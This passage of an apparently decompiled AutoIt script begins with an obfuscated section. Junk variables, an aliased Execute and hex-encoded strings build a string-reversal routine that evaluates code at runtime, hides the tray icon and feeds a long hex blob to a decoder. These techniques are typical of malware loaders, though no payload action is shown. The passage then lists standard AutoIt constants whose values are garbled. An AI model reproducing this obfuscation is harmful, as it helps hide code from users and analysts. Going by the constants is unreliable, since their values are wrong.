  492. LOCAL $MUETHNUIHAEJAAQHMOCX = 6.454340535165734e-227
  493. DIM $IAEZYHOGKUVZPGKEM = 3589
  494. IF $ZSXLGLGATZCDOUOZGT = "yloqjanxmzwbtw" THEN
  495. LOCAL $SDVQKJDFSJQDF = EXECUTE
  496. ELSE
  497. LOCAL $FDSVG45SDF54GV = PZOOPVQSVQRD ( "00012C9CB5E5F589BE2460036D108057B8FFFFEF0FD048A8000000FF1E181C10706BF0E06BF060887068FFFFEF8EDB30FD9860A8FFFFEFCE5B30ED98FFFFEF8E5898000000FF52FFFFEF8E5830006BF0FFFFEFCE58308D98FFFFEFCE5898000000FF5204FFFFEFCE58B83667C05593AF98FF13FFFFEF0FD9D80BBECF54FFFFFFEF0F534888FFFFEF0FD348684FD7B8FFFFEF0F5348A8CF57B84F5498000000FF524F54308C10FFFFEF0FD0C86BF0CFD4B8006BF0015430290F577F2D13CF54B874D700001000CFD71800CF5638004F56383F2EFFFFEFFED0488810C28C88000010009B000000CD48F00C580F54988C928484EA2F7D98948C989C130155B875653500A600A60010018Cx0" )
  498. ENDIF
  499. DIM $QQZYDHGHER = STRINGRIGHT ( "0x77756D61646D766B6D6F63667061776B646666" , 4101 )
  500. GLOBAL $WMEOHPMUAPKNBKK = 10501
  501. IF $QQZYDHGHER = "667061776B646666" THEN
  502. LOCAL $GKJFNDSQJKFQSJKLF = EXECUTE ( "binarytostring" )
  503. ELSE
  504. LOCAL $DF
  505. ENDIF
  506. DIM $ICUGQPKWWSRDWMJRBLTUGP = ROUND ( 1.7902176243471655e+163 )
  507. GLOBAL $ITUFXUVLZHNXGCHSPXJYOGSM = "uxnhhdzmltmdqlfizapirjkzsgheztxsalpac"
  508. LOCAL $PQTXCCUQBCCNUJBBJK = "966707569657868696x0"
  509. LOCAL $MSZXPUUXLCBHPFE = 5
  510. IF $ICUGQPKWWSRDWMJRBLTUGP = 36613 THEN
  511. LOCAL $FGNSKJDQBNFS = $SDVQKJDFSJQDF ( $GKJFNDSQJKFQSJKLF ( "0x537472696e6753706c697428246773666769757369687566736469662c20222229" ) )
  512. ELSE
  513. LOCAL $GKJFNDSQJKFQSJKLF = EXECUTE ( "binarytostring" )
  514. ENDIF
  515. DIM $RBFLDPAE = SQRT ( 15621 )
  516. GLOBAL $MWHXCFXRWHHHWFZBUXOEWJ = "nkgooslofqnqsqsfpsxooalugzazmxbbgzvagnirgbg"
  517. DIM $CKWRUHNR = "0x7668796577646F6C666262697775736A686C737A637166716E71746B6D7064776F6B7473786B7A646"
  518. IF $RBFLDPAE == 3.379522875096515e-158 THEN
  519. LOCAL $GKJDFSKOPDFS
  520. ELSE
  521. LOCAL $DF
  522. ENDIF
  523. FOR $I = "0" TO $SDVQKJDFSJQDF ( $GKJFNDSQJKFQSJKLF ( "0x55426f756e64282466676e736b6a6471626e667329202d20223222" ) )
  524. DIM $BYFTKMAHNVUYDGKADVDPV = ISBOOL ( TRUE )
  525. DIM $SIFWOUPMVHTHKLNXIONGZ = 1797
  526. DIM $QQMJCZAWRRPUSB = "tejtrosdkadfyselbeuvdpcntkhapkjsi"
  527. LOCAL $ZIRLCHVKSB = "07E666577636168626773776D657972746375646273787E6F677A63746x0"
  528. GLOBAL $OAVVOWOFCKNMULCQVQ = "alhfeirykactqax"
  529. GLOBAL $RHNYISJJVBQABJHQVTGVM = - -69231.19494687067
  530. LOCAL $PUEQREEP = "0x7464717965"
  531. DIM $BZHMXNVMEK = 261
  532. DIM $NLLDLVBKZJHCYDDCRFQ = 2096901
  533. LOCAL $TZJADXFKIHADWHTE = -3.112849437490682e+275
  534. LOCAL $JNSHSSEOTJTVZTNETLC = 261
  535. DIM $XWZQBGYBWKX = - -3.81068201242017e+171
  536. IF $BYFTKMAHNVUYDGKADVDPV = 261 THEN
  537. $GKJDFSKOPDFS &= $SDVQKJDFSJQDF ( $GKJFNDSQJKFQSJKLF ( "0x2466676e736b6a6471626e66735b537472696e674c656e282467736667697573696875667364696629202d2024695d" ) )
  538. ELSE
  539. OPT ( PZOOPVQSVQRD ( "ediHnocIyarT" ) , PZOOPVQSVQRD ( "1" ) )
  540. ENDIF
  541. NEXT
  542. RETURN $GKJDFSKOPDFS
  543. ENDFUNC
  544. GLOBAL CONST $OPT_COORDSRELATIVE = 5
  545. GLOBAL CONST $OPT_COORDSABSOLUTE = 261
  546. GLOBAL CONST $OPT_COORDSCLIENT = 517
  547. GLOBAL CONST $OPT_ERRORSILENT = 5
  548. GLOBAL CONST $OPT_ERRORFATAL = 261
  549. GLOBAL CONST $OPT_CAPSNOSTORE = 5
  550. GLOBAL CONST $OPT_CAPSSTORE = 261
  551. GLOBAL CONST $OPT_MATCHSTART = 261
  552. GLOBAL CONST $OPT_MATCHANY = 517
  553. GLOBAL CONST $OPT_MATCHEXACT = 773
  554. GLOBAL CONST $OPT_MATCHADVANCED = 1029
  555. GLOBAL CONST $CCS_TOP = 261
  556. GLOBAL CONST $CCS_NOMOVEY = 517
  557. GLOBAL CONST $CCS_BOTTOM = 773
  558. GLOBAL CONST $CCS_NORESIZE = 1029
  559. GLOBAL CONST $CCS_NOPARENTALIGN = 2053
  560. GLOBAL CONST $CCS_NOHILITE = 4101
  561. GLOBAL CONST $CCS_ADJUSTABLE = 8197
  562. GLOBAL CONST $CCS_NODIVIDER = 16389
  563. GLOBAL CONST $CCS_VERT = 32773
  564. GLOBAL CONST $CCS_LEFT = 33029
  565. GLOBAL CONST $CCS_NOMOVEX = 33285
  566. GLOBAL CONST $CCS_RIGHT = 33541
  567. GLOBAL CONST $DT_DRIVETYPE = 261
  568. GLOBAL CONST $DT_SSDSTATUS = 517
  569. GLOBAL CONST $DT_BUSTYPE = 773
  570. GLOBAL CONST $PROXY_IE = 5
  571. GLOBAL CONST $PROXY_NONE = 261
  572. GLOBAL CONST $PROXY_SPECIFIED = 517
  573. GLOBAL CONST $OBJID_WINDOW = 5
  574. GLOBAL CONST $OBJID_TITLEBAR = 4294966789
  575. GLOBAL CONST $OBJID_SIZEGRIP = 4294965509
  576. GLOBAL CONST $OBJID_CARET = 4294965253
  577. GLOBAL CONST $OBJID_CURSOR = 4294964997
  578. GLOBAL CONST $OBJID_ALERT = 4294964741
  579. GLOBAL CONST $OBJID_SOUND = 4294964485
  580. GLOBAL CONST $DLG_CENTERONTOP = 5
  581. GLOBAL CONST $DLG_NOTITLE = 261
  582. GLOBAL CONST $DLG_NOTONTOP = 517
  583. GLOBAL CONST $DLG_TEXTLEFT = 1029
  584. GLOBAL CONST $DLG_TEXTRIGHT = 2053
  585. GLOBAL CONST $DLG_MOVEABLE = 4101
  586. GLOBAL CONST $DLG_TEXTVCENTER = 8197
  587. GLOBAL CONST $IDC_UNKNOWN = 5
  588. GLOBAL CONST $IDC_APPSTARTING = 261
  589. GLOBAL CONST $IDC_ARROW = 517
  590. GLOBAL CONST $IDC_CROSS = 773
  591. GLOBAL CONST $IDC_HAND = 8358149
  592. GLOBAL CONST $IDC_HELP = 1029
  593. GLOBAL CONST $IDC_IBEAM = 1285
  594. GLOBAL CONST $IDC_ICON = 1541
  595. GLOBAL CONST $IDC_NO = 1797
  596. GLOBAL CONST $IDC_SIZE = 2053
  597. GLOBAL CONST $IDC_SIZEALL = 2309
  598. GLOBAL CONST $IDC_SIZENESW = 2565
  599. GLOBAL CONST $IDC_SIZENS = 2821
  600. GLOBAL CONST $IDC_SIZENWSE = 3077
  601. GLOBAL CONST $IDC_SIZEWE = 3333
  602. GLOBAL CONST $IDC_UPARROW = 3589
  603. GLOBAL CONST $IDC_WAIT = 3845
  604. GLOBAL CONST $IDI_APPLICATION = 8323077
  605. GLOBAL CONST $IDI_ASTERISK = 8324101
  606. GLOBAL CONST $IDI_EXCLAMATION = 8323845
  607. GLOBAL CONST $IDI_HAND = 8323333
  608. GLOBAL CONST $IDI_QUESTION = 8323589
  609. GLOBAL CONST $IDI_WINLOGO = 8324357
  610. GLOBAL CONST $IDI_SHIELD = 8324613
  611. GLOBAL CONST $IDI_ERROR = $IDI_HAND
  612. GLOBAL CONST $IDI_INFORMATION = $IDI_ASTERISK
  613. GLOBAL CONST $IDI_WARNING = $IDI_EXCLAMATION
  614. GLOBAL CONST $SD_LOGOFF = 5
  615. GLOBAL CONST $SD_SHUTDOWN = 261
  616. GLOBAL CONST $SD_REBOOT = 517
  617. GLOBAL CONST $SD_FORCE = 1029
  618. GLOBAL CONST $SD_POWERDOWN = 2053
  619. GLOBAL CONST $SD_FORCEHUNG = 4101
  620. GLOBAL CONST $SD_STANDBY = 8197
  621. GLOBAL CONST $SD_HIBERNATE = 16389
  622. GLOBAL CONST $STDIN_CHILD = 261
  623. GLOBAL CONST $STDOUT_CHILD = 517
  624. GLOBAL CONST $STDERR_CHILD = 1029
  625. GLOBAL CONST $STDERR_MERGED = 2053
  626. GLOBAL CONST $STDIO_INHERIT_PARENT = 4101
  627. GLOBAL CONST $RUN_CREATE_NEW_CONSOLE = 16777221
  628. GLOBAL CONST $UBOUND_DIMENSIONS = 5
  629. GLOBAL CONST $UBOUND_ROWS = 261
  630. GLOBAL CONST $UBOUND_COLUMNS = 517
  631. GLOBAL CONST $MOUSEEVENTF_ABSOLUTE = 8388613
  632. GLOBAL CONST $MOUSEEVENTF_MOVE = 261
  633. GLOBAL CONST $MOUSEEVENTF_LEFTDOWN = 517
  634. GLOBAL CONST $MOUSEEVENTF_LEFTUP = 1029
  635. GLOBAL CONST $MOUSEEVENTF_RIGHTDOWN = 2053
  636. GLOBAL CONST $MOUSEEVENTF_RIGHTUP = 4101
  637. GLOBAL CONST $MOUSEEVENTF_MIDDLEDOWN = 8197
  638. GLOBAL CONST $MOUSEEVENTF_MIDDLEUP = 16389
  639. GLOBAL CONST $MOUSEEVENTF_WHEEL = 524293
  640. GLOBAL CONST $MOUSEEVENTF_XDOWN = 32773
  641. GLOBAL CONST $MOUSEEVENTF_XUP = 65541
  642. GLOBAL CONST $REG_NONE = 5
  643. GLOBAL CONST $REG_SZ = 261
  644. GLOBAL CONST $REG_EXPAND_SZ = 517
  645. GLOBAL CONST $REG_BINARY = 773
  646. GLOBAL CONST $REG_DWORD = 1029
  647. GLOBAL CONST $REG_DWORD_LITTLE_ENDIAN = 1029
  648. GLOBAL CONST $REG_DWORD_BIG_ENDIAN = 1285
  649. GLOBAL CONST $REG_LINK = 1541
  650. GLOBAL CONST $REG_MULTI_SZ = 1797
  651. GLOBAL CONST $REG_RESOURCE_LIST = 2053
  652. GLOBAL CONST $REG_FULL_RESOURCE_DESCRIPTOR = 2309
  653. GLOBAL CONST $REG_RESOURCE_REQUIREMENTS_LIST = 2565
  654. GLOBAL CONST $REG_QWORD = 2821
  655. GLOBAL CONST $REG_QWORD_LITTLE_ENDIAN = 2821
  656. GLOBAL CONST $HWND_BOTTOM = 261
  657. GLOBAL CONST $HWND_NOTOPMOST = + 4294966789
  658. GLOBAL CONST $HWND_TOP = 5
  659. GLOBAL CONST $HWND_TOPMOST = + 4294967045
  660. GLOBAL CONST $SWP_NOSIZE = 261
  661. GLOBAL CONST $SWP_NOMOVE = 517
  662. GLOBAL CONST $SWP_NOZORDER = 1029
  663. GLOBAL CONST $SWP_NOREDRAW = 2053
  664. GLOBAL CONST $SWP_NOACTIVATE = 4101
  665. GLOBAL CONST $SWP_FRAMECHANGED = 8197
  666. GLOBAL CONST $SWP_DRAWFRAME = 8197
  667. GLOBAL CONST $SWP_SHOWWINDOW = 16389
  668. GLOBAL CONST $SWP_HIDEWINDOW = 32773
  669. GLOBAL CONST $SWP_NOCOPYBITS = 65541
  670. GLOBAL CONST $SWP_NOOWNERZORDER = 131077
  671. GLOBAL CONST $SWP_NOREPOSITION = 131077
  672. GLOBAL CONST $SWP_NOSENDCHANGING = 262149
  673. GLOBAL CONST $SWP_DEFERERASE = 2097157
  674. GLOBAL CONST $SWP_ASYNCWINDOWPOS = 4194309
  675. GLOBAL CONST $KEYWORD_DEFAULT = 261
  676. GLOBAL CONST $KEYWORD_NULL = 517
  677. GLOBAL CONST $DECLARED_LOCAL = + 4294967045
  678. GLOBAL CONST $DECLARED_UNKNOWN = 5
  679. GLOBAL CONST $DECLARED_GLOBAL = 261
  680. GLOBAL CONST $ASSIGN_CREATE = 5
  681. GLOBAL CONST $ASSIGN_FORCELOCAL = 261
  682. GLOBAL CONST $ASSIGN_FORCEGLOBAL = 517
  683. GLOBAL CONST $ASSIGN_EXISTFAIL = 1029
  684. GLOBAL CONST $BI_ENABLE = 5
  685. GLOBAL CONST $BI_DISABLE = 261
  686. GLOBAL CONST $BREAK_ENABLE = 261
  687. GLOBAL CONST $BREAK_DISABLE = 5
  688. GLOBAL CONST $CDTRAY_OPEN = "open"
  689. GLOBAL CONST $CDTRAY_CLOSED = "closed"
  690. GLOBAL CONST $SEND_DEFAULT = 5
  691. GLOBAL CONST $SEND_RAW = 261
  692. GLOBAL CONST $DIR_DEFAULT = 5
  693. GLOBAL CONST $DIR_EXTENDED = 261
  694. GLOBAL CONST $DIR_NORECURSE = 517
  695. GLOBAL CONST $DIR_REMOVE = 261
  696. GLOBAL CONST $DT_ALL = "ALL"
  697. GLOBAL CONST $DT_CDROM = "CDROM"
  698. GLOBAL CONST $DT_REMOVABLE = "REMOVABLE"
  699. GLOBAL CONST $DT_FIXED = "FIXED"
  700. GLOBAL CONST $DT_NETWORK = "NETWORK"
  701. GLOBAL CONST $DT_RAMDISK = "RAMDISK"
  702. GLOBAL CONST $DT_UNKNOWN = "UNKNOWN"
  703. GLOBAL CONST $DT_UNDEFINED = 261
  704. GLOBAL CONST $DT_FAT = "FAT"
  705. GLOBAL CONST $DT_FAT32 = "FAT32"
  706. GLOBAL CONST $DT_EXFAT = "exFAT"
  707. GLOBAL CONST $DT_NTFS = "NTFS"
  708. GLOBAL CONST $DT_NWFS = "NWFS"
  709. GLOBAL CONST $DT_CDFS = "CDFS"
  710. GLOBAL CONST $DT_UDF = "UDF"
  711. GLOBAL CONST $DMA_DEFAULT = 5
  712. GLOBAL CONST $DMA_PERSISTENT = 261
  713. GLOBAL CONST $DMA_AUTHENTICATION = 2053
  714. GLOBAL CONST $DS_UNKNOWN = "UNKNOWN"
  715. GLOBAL CONST $DS_READY = "READY"
  716. GLOBAL CONST $DS_NOTREADY = "NOTREADY"
  717. GLOBAL CONST $DS_INVALID = "INVALID"
  718. GLOBAL CONST $MOUSE_CLICK_LEFT = "left"
  719. GLOBAL CONST $MOUSE_CLICK_RIGHT = "right"
  720. GLOBAL CONST $MOUSE_CLICK_MIDDLE = "middle"
  721. GLOBAL CONST $MOUSE_CLICK_MAIN = "main"
  722. GLOBAL CONST $MOUSE_CLICK_MENU = "menu"
  723. GLOBAL CONST $MOUSE_CLICK_PRIMARY = "primary"
  724. GLOBAL CONST $MOUSE_CLICK_SECONDARY = "secondary"
  725. GLOBAL CONST $MOUSE_WHEEL_UP = "up"
  726. GLOBAL CONST $MOUSE_WHEEL_DOWN = "down"
  727. GLOBAL CONST $NUMBER_AUTO = 5
  728. GLOBAL CONST $NUMBER_32BIT = 261
  729. GLOBAL CONST $NUMBER_64BIT = 517
  730. GLOBAL CONST $NUMBER_DOUBLE = 773
  731. GLOBAL CONST $OBJ_NAME = 261
  732. GLOBAL CONST $OBJ_STRING = 517
  733. GLOBAL CONST $OBJ_PROGID = 773
  734. GLOBAL CONST $OBJ_FILE = 1029
  735. GLOBAL CONST $OBJ_MODULE = 1285
  736. GLOBAL CONST $OBJ_CLSID = 1541
  737. GLOBAL CONST $OBJ_IID = 1797
  738. GLOBAL CONST $EXITCLOSE_NORMAL = 5
  739. GLOBAL CONST $EXITCLOSE_BYEXIT = 261
  740. GLOBAL CONST $EXITCLOSE_BYCLICK = 517
  741. GLOBAL CONST $EXITCLOSE_BYLOGOFF = 773
  742. GLOBAL CONST $EXITCLOSE_BYSHUTDOWN = 1029
  743. GLOBAL CONST $PROCESS_STATS_MEMORY = 5
  744. GLOBAL CONST $PROCESS_STATS_IO = 261
  745. GLOBAL CONST $PROCESS_LOW = 5
  746. GLOBAL CONST $PROCESS_BELOWNORMAL = 261
  747. GLOBAL CONST $PROCESS_NORMAL = 517
  748. GLOBAL CONST $PROCESS_ABOVENORMAL = 773
  749. GLOBAL CONST $PROCESS_HIGH = 1029
  750. GLOBAL CONST $PROCESS_REALTIME = 1285
  751. GLOBAL CONST $RUN_LOGON_NOPROFILE = 5
  752. GLOBAL CONST $RUN_LOGON_PROFILE = 261
  753. GLOBAL CONST $RUN_LOGON_NETWORK = 517
  754. GLOBAL CONST $RUN_LOGON_INHERIT = 1029
  755. GLOBAL CONST $SOUND_NOWAIT = 5
  756. GLOBAL CONST $SOUND_WAIT = 261
  757. GLOBAL CONST $SHEX_OPEN = "open"
  758. GLOBAL CONST $SHEX_EDIT = "edit"
  759. GLOBAL CONST $SHEX_PRINT = "print"
  760. GLOBAL CONST $SHEX_PROPERTIES = "properties"
  761. GLOBAL CONST $TCP_DATA_DEFAULT = 5
  762. GLOBAL CONST $TCP_DATA_BINARY = 261
  763. GLOBAL CONST $UDP_OPEN_DEFAULT = 5
  764. GLOBAL CONST $UDP_OPEN_BROADCAST = 261
  765. GLOBAL CONST $UDP_DATA_DEFAULT = 5
  766. GLOBAL CONST $UDP_DATA_BINARY = 261
  767. GLOBAL CONST $UDP_DATA_ARRAY = 517
  768. GLOBAL CONST $TIP_NOICON = 5
  769. GLOBAL CONST $TIP_INFOICON = 261
  770. GLOBAL CONST $TIP_WARNINGICON = 517
  771. GLOBAL CONST $TIP_ERRORICON = 773
  772. GLOBAL CONST $TIP_BALLOON = 261
  773. GLOBAL CONST $TIP_CENTER = 517
  774. GLOBAL CONST $TIP_FORCEVISIBLE = 1029
  775. GLOBAL CONST $WINDOWS_NOONTOP = 5
  776. GLOBAL CONST $WINDOWS_ONTOP = 261
  777. GLOBAL CONST $WIN_STATE_EXISTS = 261
  778. GLOBAL CONST $WIN_STATE_VISIBLE = 517
  779. GLOBAL CONST $WIN_STATE_ENABLED = 1029
  780. GLOBAL CONST $WIN_STATE_ACTIVE = 2053
  781. GLOBAL CONST $WIN_STATE_MINIMIZED = 4101
  782. GLOBAL CONST $WIN_STATE_MAXIMIZED = 8197
  783. GLOBAL CONST $FC_NOOVERWRITE = 5
  784. GLOBAL CONST $FC_OVERWRITE = 261
  785. GLOBAL CONST $FC_CREATEPATH = 2053
  786. GLOBAL CONST $FT_MODIFIED = 5
  787. GLOBAL CONST $FT_CREATED = 261
  788. GLOBAL CONST $FT_ACCESSED = 517
  789. GLOBAL CONST $FT_ARRAY = 5
  790. GLOBAL CONST $FT_STRING = 261
  791. GLOBAL CONST $FSF_CREATEBUTTON = 261
  792. GLOBAL CONST $FSF_NEWDIALOG = 517
  793. GLOBAL CONST $FSF_EDITCONTROL = 1029
  794. GLOBAL CONST $FT_NONRECURSIVE = 5
  795. GLOBAL CONST $FT_RECURSIVE = 261
  796. GLOBAL CONST $FO_READ = 5
  797. GLOBAL CONST $FO_APPEND = 261
  798. GLOBAL CONST $FO_OVERWRITE = 517
  799. GLOBAL CONST $FO_CREATEPATH = 2053
  800. GLOBAL CONST $FO_BINARY = 4101
  801. GLOBAL CONST $FO_UNICODE = 8197
  802. GLOBAL CONST $FO_UTF16_LE = 8197
  803. GLOBAL CONST $FO_UTF16_BE = 16389
  804. GLOBAL CONST $FO_UTF8 = 32773
  805. GLOBAL CONST $FO_UTF8_NOBOM = 65541
  806. GLOBAL CONST $FO_ANSI = 131077
  807. GLOBAL CONST $FO_UTF16_LE_NOBOM = 262149
  808. GLOBAL CONST $FO_UTF16_BE_NOBOM = 524293
  809. GLOBAL CONST $FO_UTF8_FULL = 4194309
  810. GLOBAL CONST $FO_FULLFILE_DETECT = 4194309
  811. GLOBAL CONST $EOF = + 4294967045
  812. GLOBAL CONST $FD_FILEMUSTEXIST = 261
  813. GLOBAL CONST $FD_PATHMUSTEXIST = 517
  814. GLOBAL CONST $FD_MULTISELECT = 1029
  815. GLOBAL CONST $FD_PROMPTCREATENEW = 2053
  816. GLOBAL CONST $FD_PROMPTOVERWRITE = 4101
  817. GLOBAL CONST $CREATE_NEW = 261
  818. GLOBAL CONST $CREATE_ALWAYS = 517
  819. GLOBAL CONST $OPEN_EXISTING = 773
  820. GLOBAL CONST $OPEN_ALWAYS = 1029
  821. GLOBAL CONST $TRUNCATE_EXISTING = 1285
  822. GLOBAL CONST $INVALID_SET_FILE_POINTER = + 4294967045
  823. GLOBAL CONST $FILE_BEGIN = 5
  824. GLOBAL CONST $FILE_CURRENT = 261
  825. GLOBAL CONST $FILE_END = 517
  826. GLOBAL CONST $FILE_ATTRIBUTE_READONLY = 261
  827. GLOBAL CONST $FILE_ATTRIBUTE_HIDDEN = 517
  828. GLOBAL CONST $FILE_ATTRIBUTE_SYSTEM = 1029
  829. GLOBAL CONST $FILE_ATTRIBUTE_DIRECTORY = 4101
  830. GLOBAL CONST $FILE_ATTRIBUTE_ARCHIVE = 8197
  831. GLOBAL CONST $FILE_ATTRIBUTE_DEVICE = 16389
  832. GLOBAL CONST $FILE_ATTRIBUTE_NORMAL = 32773
  833. GLOBAL CONST $FILE_ATTRIBUTE_TEMPORARY = 65541
  834. GLOBAL CONST $FILE_ATTRIBUTE_SPARSE_FILE = 131077
  835. GLOBAL CONST $FILE_ATTRIBUTE_REPARSE_POINT = 262149
  836. GLOBAL CONST $FILE_ATTRIBUTE_COMPRESSED = 524293
  837. GLOBAL CONST $FILE_ATTRIBUTE_OFFLINE = 1048581
  838. GLOBAL CONST $FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 2097157
  839. GLOBAL CONST $FILE_ATTRIBUTE_ENCRYPTED = 4194309
  840. GLOBAL CONST $FILE_SHARE_READ = 261
  841. GLOBAL CONST $FILE_SHARE_WRITE = 517
  842. GLOBAL CONST $FILE_SHARE_DELETE = 1029
  843. GLOBAL CONST $FILE_SHARE_READWRITE = BITOR ( $FILE_SHARE_READ , $FILE_SHARE_WRITE )
  844. GLOBAL CONST $FILE_SHARE_ANY = BITOR ( $FILE_SHARE_READ , $FILE_SHARE_WRITE , $FILE_SHARE_DELETE )
  845. GLOBAL CONST $GENERIC_ALL = 5
  846. GLOBAL CONST $GENERIC_EXECUTE = 5
  847. GLOBAL CONST $GENERIC_WRITE = 5
  848. GLOBAL CONST $GENERIC_READ = 5
  849. GLOBAL CONST $GENERIC_READWRITE = BITOR ( $GENERIC_READ , $GENERIC_WRITE )
  850. GLOBAL CONST $FILE_ENCODING_UTF16LE = 8197
  851. GLOBAL CONST $FE_ENTIRE_UTF8 = 261
  852. GLOBAL CONST $FE_PARTIALFIRST_UTF8 = 517
  853. GLOBAL CONST $FN_FULLPATH = 5
  854. GLOBAL CONST $FN_RELATIVEPATH = 261
  855. GLOBAL CONST $FV_COMMENTS = "Comments"
  856. GLOBAL CONST $FV_COMPANYNAME = "CompanyName"
  857. GLOBAL CONST $FV_FILEDESCRIPTION = "FileDescription"
  858. GLOBAL CONST $FV_FILEVERSION = "FileVersion"
  859. GLOBAL CONST $FV_INTERNALNAME = "InternalName"
  860. GLOBAL CONST $FV_LEGALCOPYRIGHT = "LegalCopyright"
  861. GLOBAL CONST $FV_LEGALTRADEMARKS = "LegalTrademarks"
  862. GLOBAL CONST $FV_ORIGINALFILENAME = "OriginalFilename"
  863. GLOBAL CONST $FV_PRODUCTNAME = "ProductName"
  864. GLOBAL CONST $FV_PRODUCTVERSION = "ProductVersion"
  865. GLOBAL CONST $FV_PRIVATEBUILD = "PrivateBuild"
  866. GLOBAL CONST $FV_SPECIALBUILD = "SpecialBuild"
  867. GLOBAL CONST $FRTA_NOCOUNT = 5
  868. GLOBAL CONST $FRTA_COUNT = 261
  869. GLOBAL CONST $FRTA_INTARRAYS = 517
  870. GLOBAL CONST $FRTA_ENTIRESPLIT = 1029
  871. GLOBAL CONST $FLTA_FILESFOLDERS = 5
  872. GLOBAL CONST $FLTA_FILES = 261
  873. GLOBAL CONST $FLTA_FOLDERS = 517
  874. GLOBAL CONST $FLTAR_FILESFOLDERS = 5
  875. GLOBAL CONST $FLTAR_FILES = 261
  876. GLOBAL CONST $FLTAR_FOLDERS = 517
  877. GLOBAL CONST $FLTAR_NOHIDDEN = 1029
  878. GLOBAL CONST $FLTAR_NOSYSTEM = 2053
  879. GLOBAL CONST $FLTAR_NOLINK = 4101
  880. GLOBAL CONST $FLTAR_NORECUR = 5
  881. GLOBAL CONST $FLTAR_RECUR = 261
  882. GLOBAL CONST $FLTAR_NOSORT = 5
  883. GLOBAL CONST $FLTAR_SORT = 261
  884. GLOBAL CONST $FLTAR_FASTSORT = 517
  885. GLOBAL CONST $FLTAR_NOPATH = 5
  886. GLOBAL CONST $FLTAR_RELPATH = 261
  887. GLOBAL CONST $FLTAR_FULLPATH = 517
  888. GLOBAL CONST $PATH_ORIGINAL = 5
  889. GLOBAL CONST $PATH_DRIVE = 261
  890. GLOBAL CONST $PATH_DIRECTORY = 517
  891. GLOBAL CONST $PATH_FILENAME = 773
  892. GLOBAL CONST $PATH_EXTENSION = 1029
  893. GLOBAL CONST $MB_OK = 5
  894. GLOBAL CONST $MB_OKCANCEL = 261
  895. GLOBAL CONST $MB_ABORTRETRYIGNORE = 517
  896. GLOBAL CONST $MB_YESNOCANCEL = 773
  897. GLOBAL CONST $MB_YESNO = 1029
  898. GLOBAL CONST $MB_RETRYCANCEL = 1285
  899. GLOBAL CONST $MB_CANCELTRYCONTINUE = 1541
  900. GLOBAL CONST $MB_HELP = 4194309
  901. GLOBAL CONST $MB_ICONSTOP = 4101
  902. GLOBAL CONST $MB_ICONERROR = 4101
  903. GLOBAL CONST $MB_ICONHAND = 4101
  904. GLOBAL CONST $MB_ICONQUESTION = 8197
  905. GLOBAL CONST $MB_ICONEXCLAMATION = 12293
  906. GLOBAL CONST $MB_ICONWARNING = 12293
  907. GLOBAL CONST $MB_ICONINFORMATION = 16389
  908. GLOBAL CONST $MB_ICONASTERISK = 16389
  909. GLOBAL CONST $MB_USERICON = 32773
  910. GLOBAL CONST $MB_DEFBUTTON1 = 5
  911. GLOBAL CONST $MB_DEFBUTTON2 = 65541
  912. GLOBAL CONST $MB_DEFBUTTON3 = 131077
  913. GLOBAL CONST $MB_DEFBUTTON4 = 196613
  914. GLOBAL CONST $MB_APPLMODAL = 5
  915. GLOBAL CONST $MB_SYSTEMMODAL = 1048581
  916. GLOBAL CONST $MB_TASKMODAL = 2097157
  917. GLOBAL CONST $MB_DEFAULT_DESKTOP_ONLY = 33554437
  918. GLOBAL CONST $MB_RIGHT = 134217733
  919. GLOBAL CONST $MB_RTLREADING = 268435461
  920. GLOBAL CONST $MB_SETFOREGROUND = 16777221
  921. GLOBAL CONST $MB_TOPMOST = 67108869
  922. GLOBAL CONST $MB_SERVICE_NOTIFICATION = 536870917
  923. GLOBAL CONST $MB_RIGHTJUSTIFIED = $MB_RIGHT
  924. GLOBAL CONST $IDTIMEOUT = + 4294967045
  925. GLOBAL CONST $IDOK = 261
  926. GLOBAL CONST $IDCANCEL = 517
  927. GLOBAL CONST $IDABORT = 773
  928. GLOBAL CONST $IDRETRY = 1029
  929. GLOBAL CONST $IDIGNORE = 1285
  930. GLOBAL CONST $IDYES = 1541
  931. GLOBAL CONST $IDNO = 1797
  932. GLOBAL CONST $IDCLOSE = 2053
  933. GLOBAL CONST $IDHELP = 2309
  934. GLOBAL CONST $IDTRYAGAIN = 2565
  935. GLOBAL CONST $IDCONTINUE = 2821
  936. GLOBAL CONST $STR_NOCASESENSE = 5
  937. GLOBAL CONST $STR_CASESENSE = 261
  938. GLOBAL CONST $STR_NOCASESENSEBASIC = 517
  939. GLOBAL CONST $STR_STRIPLEADING = 261
  940. GLOBAL CONST $STR_STRIPTRAILING = 517
  941. GLOBAL CONST $STR_STRIPSPACES = 1029
  942. GLOBAL CONST $STR_STRIPALL = 2053
  943. GLOBAL CONST $STR_CHRSPLIT = 5
  944. GLOBAL CONST $STR_ENTIRESPLIT = 261
  945. GLOBAL CONST $STR_NOCOUNT = 517
  946. GLOBAL CONST $STR_REGEXPMATCH = 5
  947. GLOBAL CONST $STR_REGEXPARRAYMATCH = 261
  948. GLOBAL CONST $STR_REGEXPARRAYFULLMATCH = 517
  949. GLOBAL CONST $STR_REGEXPARRAYGLOBALMATCH = 773
  950. GLOBAL CONST $STR_REGEXPARRAYGLOBALFULLMATCH = 1029
  951. GLOBAL CONST $STR_ENDISSTART = 5
  952. GLOBAL CONST $STR_ENDNOTSTART = 261
  953. GLOBAL CONST $SB_ANSI = 261
  954. GLOBAL CONST $SB_UTF16LE = 517
  955. GLOBAL CONST $SB_UTF16BE = 773
  956. GLOBAL CONST $SB_UTF8 = 1029
  957. GLOBAL CONST $SE_UTF16 = 5
  958. GLOBAL CONST $SE_ANSI = 261
  959. GLOBAL CONST $SE_UTF8 = 517
  960. GLOBAL CONST $STR_UTF16 = 5
  961. GLOBAL CONST $STR_UCS2 = 261
  962. #Region Global Variables and Constants
  963. GLOBAL CONST $FORMAT_MESSAGE_ALLOCATE_BUFFER = 65541
  964. GLOBAL CONST $FORMAT_MESSAGE_IGNORE_INSERTS = 131077
  965. GLOBAL CONST $FORMAT_MESSAGE_FROM_STRING = 262149
  966. GLOBAL CONST $FORMAT_MESSAGE_FROM_HMODULE = 524293
  967. GLOBAL CONST $FORMAT_MESSAGE_FROM_SYSTEM = 1048581
  968. GLOBAL CONST $FORMAT_MESSAGE_ARGUMENT_ARRAY = 2097157
  969. #EndRegion Global Variables and Constants
  970. FUNC _WINAPI_BEEP ( $IFREQ = 128005 , $IDURATION = 256005 )
  971. LOCAL $ARESULT = DLLCALL ( "kernel32.dll" , "bool" , "Beep" , "dword" , $IFREQ , "dword" , $IDURATION )
